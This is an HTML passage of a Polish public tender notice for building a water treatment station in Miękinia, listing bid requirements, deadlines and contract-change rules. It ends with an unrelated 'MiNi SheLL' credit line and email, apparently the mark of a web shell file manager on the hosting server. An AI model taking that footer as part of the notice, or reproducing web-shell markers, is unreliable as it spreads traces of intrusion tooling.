<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.26-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca  przystępując  do  przetargu obowiązany jest  wnieść  wadium 
w wysokości: 30 000 zł (słownie: trzydzieści tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Spełnia warunek dotyczący wiedzy i doświadczenia tj. w okresie ostatnich pięciu lat przed upływem terminu składania ofert ,a jeżeli okres prowadzenia jest krótszy - w tym okresie , wykonał minimum dwa zamówienia , których przedmiotem  była budowa lub przebudowa stacji uzdatniania wody wraz z automatycznym sterowaniem jej pracy - odpowiadających zakresem przedmiotowego zamówienia  -  o wartości każdej z robót min. 1 mln. PLN netto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4)	Spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia tj: 
a)Kierownik Budowy - osoba posiadająca następujące kwalifikacje: -wykształcenie wyższe, -uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności ogólnobudowlanej  wraz z przynależnością do właściwej izby samorządu zawodowego, -co najmniej 8 lat doświadczenia zawodowego (liczone od dnia uzyskania uprawnień budowlanych); 
Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jedn. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394). Wszystkie wymienione powyżej (w punkcie 4) osoby winny posiadać biegłą znajomość języka polskiego. Zamawiający dopuszcza zmianę tego wymogu wyłącznie w przypadku, gdy Wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym a personelem Wykonawcy, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia, stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego. Wykonawca zatrudniając tłumacza winien wziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia, tłumacz ten winien być biegły w bezbłędnym i jednoznacznym tłumaczeniu zagadnień technicznych, ekonomicznych i prawnych
b) pozostałe osoby  posiadające następujące kwalifikacje: -wykształcenie wyższe, -uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalnościach odpowiednich do poszczególnych branż wykonawczych  wraz z przynależnością do właściwej izby samorządu zawodowego, -co najmniej 5 lat doświadczenia zawodowego (liczone od dnia uzyskania uprawnień budowlanych);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia warunek  dotyczący  sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia  tj: a)posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 0,5 mln PLN, b)posiada ważne i opłacone ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1,5 mln PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy . 2) Kosztorys ofertowy sporządzony w oparciu o dokumentacje projektową i specyfikacjami technicznymi wykonania i odbioru robót , przedłożone przez Zamawiającego. Szczegółowe wymagania dotyczące sporządzenia kosztorysu ofertowego określa SIWZ. Kosztorys musi zawierać dane wyjściowe do kosztorysowania (stawka roboczogodziny, zastosowane narzuty m.in. koszty pośrednie i zysk, ceny materiału i sprzętu) oraz zestawienie RMS. W kosztorysie ofertowym Wykonawca zobowiązany jest do ujęcia wszystkich pozycji katalogowych zgodnie z przyjętą technologią wykonania robót oraz wynikających z opracowanej dokumentacji technicznej i wizji lokalnej dokonanej na placu przyszłej budowy. Wycenione winny być wszystkie elementy. Zamawiający w zakresie zmian obmiaru dopuszcza jedynie takie zmiany, które nie wpływają na całościowy obmiar wycenianej pozycji np. szt. 1 - kpl. 1, próba 1 - szt. 1, 100m2 4 - 400 m2. Wykonawca nie ma prawa bez zgody Zamawiającego dokonywania zmian w przekazanym przedmiarze robot (np. dopisywania pozycji, zmiany ilości robot itp.). Jeżeli w wyniku dokonanej przez siebie analizy i obliczenia ilości robót uzna je za niewłaściwe, to zmiany ilości robot Wykonawca może dochodzić w ramach procedury pytań, zgodnie z art. 38 ustawy Pzp. 3) Dokument potwierdzający wniesienie wadium. 4) Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (w przypadku składania oferty wspólnej lub gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego. 2.Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. 3.Zmiany umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy Prawo zamówień publicznych, stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia. 4.Zmiany, o których mowa w ust. 1 mogą dotyczyć: 1)zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych, 2)aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny, 3)zmiany producenta urządzeń lub wyposażenia, 4)zmiany wymiarów, położenia lub wysokości części robót budowlanych, 5)zmiany terminów wykonania robót budowlanych, 6)zmiany ilości robót budowlanych, usług lub dostaw pod warunkiem, że wynikają one z dokumentacji projektowej i zasad wiedzy technicznej, 7)rezygnacji z wykonania części robót budowlanych, dostaw i usług, 8)zmiany osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo Budowlane lub innych ustawach, 9)zmiany podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował Zamawiający. 5.Jeżeli zmiana, o której mowa w ust. 4 wymaga zmiany dokumentacji projektowej lub specyfikacji technicznych wykonania i odbioru robót budowlanych, strona inicjująca zmianę przedstawia projekt zamienny (zatwierdzony przez organ architektoniczno-budowlany - jeżeli wymagają tego przepisy prawa budowlanego) zawierający opis proponowanych zmian, przedmiar i niezbędne rysunki. Projekt taki wymaga akceptacji nadzoru autorskiego i zatwierdzenia do realizacji przez Zamawiającego. 6.Warunkiem dokonania zmian, o których mowa w ust. 4 jest złożenie pisemnego wniosku przez stronę inicjującą zmianę zawierającego: 1)opis propozycji zmiany, 2)uzasadnienie zmiany, 3)obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy, 4)opis wpływu zmiany na terminy wykonania robót budowlanych. 7.Zmiany, o których mowa w ust. 4 mogą zostać dokonane, jeżeli zachodzą i są ich uzasadnieniem niżej wymienione okoliczności: 1)obniżenie kosztu wykonania robót (wynagrodzenia Wykonawcy) lub kosztu eksploatacji (użytkowania) obiektu, 2)poprawy wartości lub podniesienia sprawności ukończonych robót budowlanych, 3)zmiany obowiązujących przepisów, 4)podniesienie wydajności urządzeń, 5)podniesienie bezpieczeństwa wykonywania robót, 6)usprawnienia lub podniesienie walorów zdrowotnych i bezpieczeństwa w trakcie użytkowania obiektu, 7)opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane przez lub dające się przypisać Zamawiającemu, personelowi Zamawiającego; lub innemu wykonawcy, zatrudnionemu przez Zamawiającego na terenie budowy, 8)zaistnienie nieprzewidzialnych w umowie warunków geologicznych, hydrogeologicznych, wykopalisk, wyjątkowo niekorzystnych warunków klimatycznych, a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy na przewidzianych w niej warunkach, 9)udzielenie robót dodatkowych koniecznych do wykonania podstawowego zakresu zamówienia, 10)siła wyższa. 8.Podstawę obliczenia kosztów zmiany, o której mowa w ust. 6 pkt 3 w przypadku, gdy zmiany będą wynikać ze zmiany dokumentacji projektowej lub specyfikacji technicznych wykonania odbioru robót stanowi: 1)kosztorys ofertowy opracowany na podstawie cen jednostkowych oraz danych wyjściowych do kosztorysowania przyjętych przez Wykonawcę do sporządzenia pierwotnego kosztorysu ofertowego przedłożonego przez Wykonawcę do oferty, ale nie większych niż ostatnie aktualne średnie ceny publikowane w SEKOCENBUD, 2)projekt zamienny, w przypadku, gdy zmiany będą wynikać ze zmiany dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych. 9.Jednakże Wykonawca nie będzie uprawniony do żadnego przedłużenia terminów wykonania robó budowlanych i zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę. W takim przypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca. 10.Dokonanie zmian, o których mowa w ust. 4 pkt 1-5 i 7 wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miekinia.zuk.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych Sp. z o.o. , ul. Willowa 16 ; 55-330 Miękinia, sekretariat I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2010 godzina 10:15, miejsce: Zakład Usług Komunalnych Sp. z o.o. , ul. Willowa 16 ; 55-330 Miękinia, sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie dofinansowanie ze środków UE w ramach Programu Rozwoju Obszarów Wiejskich 2007 - 2013, działanie 321 -Podstawowe usługi dla gospodarki i ludności wiejskiej ,zadanie :Zapewnienie dostaw wody i odbioru ścieków na terenie Gminy Miękinia...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com